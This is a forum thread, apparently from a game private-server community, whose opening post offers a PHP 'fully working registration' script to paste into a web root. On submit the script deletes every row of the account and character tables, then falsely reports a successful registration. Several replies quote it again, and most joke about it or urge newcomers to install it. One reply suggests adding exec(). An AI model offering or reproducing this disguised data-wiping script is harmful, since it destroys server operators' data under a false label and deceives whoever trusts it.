V15 fully working registration
Well, here you go:
Just paste this to your http root folders(in xampp htdocs):
Code:
<?php
$username='sa'; //Your MSSQL Username
$passw=''; //Your MSSQL Password
$ip=''; //computer name ex: SERVER\SQLEXPRESS
$link=mssql_connect($ip, $username, $passw);
if(!isset($_post['submit'])){
?>
<form action='' method='post'>
Username:<input type='text' name='user'><br>
Password:<input type='password' name='pass'><br>
<input type='submit' value='submit'>
<?php } else{
mssql_select_db('ACCOUNT_DBF');
mssql_query('DELETE FROM ACCOUNT_TBL');
mssql_select_db('CHARACTER_01_DBF');
mssql_query('DELETE FROM CHARACTER_TBL');
echo "<font color='green'>You have successfully registered</font>";
}
?>
Re: V15 fully working registration
Loltastic!
It said the registration was successful!
Re: V15 fully working registration
Re: V15 fully working registration
lol, it is very secure, you will never get problems with hackers again!
still, should have done something with exec()
Re: V15 fully working registration
Quote:
Originally Posted by
VLxPain
lol, it is very secure, you will never get problems with hackers again!
+1 :D
Very Nice Script! >:D
Leechers Leech the script! :)
thank you sir :8:
Re: V15 fully working registration
Quote:
Originally Posted by
VLxPain
Code:
<?php
$link=mssql_connect('name', 'user', 'pass');
if(!isset($_post['submit'])){
?>
<form action='' method='post'>
Username:<input type='text' name='user'><br>
Password:<input type='password' name='pass'><br>
<input type='submit' value='submit'>
<?php } else{
mssql_select_db('ACCOUNT_DBF');
mssql_query('DELETE FROM ACCOUNT_TBL');
mssql_select_db('CHARACTER_01_DBF');
mssql_query('DELETE FROM CHARACTER_TBL');
echo "<font color='green'>You have successfully registered</font>";
?>
Lol , i bet people will try to use it
Re: V15 fully working registration
Most secure registration script I've ever seen other than mine ;>
Re: V15 fully working registration
noe nick, it be making deletion of characters that be not there (:
Re: V15 fully working registration
Quote:
Originally Posted by
VLxPain
Well, here you go:
Just paste this to your http root folders(in xampp htdocs):
Code:
<?php
$link=mssql_connect('name', 'user', 'pass');
if(!isset($_post['submit'])){
?>
<form action='' method='post'>
Username:<input type='text' name='user'><br>
Password:<input type='password' name='pass'><br>
<input type='submit' value='submit'>
<?php } else{
mssql_select_db('ACCOUNT_DBF');
mssql_query('DELETE FROM ACCOUNT_TBL');
mssql_select_db('CHARACTER_01_DBF');
mssql_query('DELETE FROM CHARACTER_TBL');
echo "<font color='green'>You have successfully registered</font>";
?>
That tickles me :)
Re: V15 fully working registration
Me want pains script! D:
OMG IT WORKS I LOVE YOU PAIN!!!
lmfao <3 xD
I'm gonna recom every1 to use this register!! <3
Re: V15 fully working registration
Kudos to you for the best registration script ever, Pain.
Re: V15 fully working registration
I don't see the point of this...
Kinda useless thread.
Re: V15 fully working registration
Nuuu, All noobies should just copy/paste this xD
Re: V15 fully working registration
Quote:
Originally Posted by
VLxPain
Well, here you go:
Just paste this to your http root folders(in xampp htdocs):
Code:
<?php
$link=mssql_connect('name', 'user', 'pass');
if(!isset($_post['submit'])){
?>
<form action='' method='post'>
Username:<input type='text' name='user'><br>
Password:<input type='password' name='pass'><br>
<input type='submit' value='submit'>
<?php } else{
mssql_select_db('ACCOUNT_DBF');
mssql_query('DELETE FROM ACCOUNT_TBL');
mssql_select_db('CHARACTER_01_DBF');
mssql_query('DELETE FROM CHARACTER_TBL');
echo "<font color='green'>You have successfully registered</font>";
?>
+1 Thanks for your contribution =D
oh and dont even bother yourself with those randon flamers ^^
Cheers!
Re: V15 fully working registration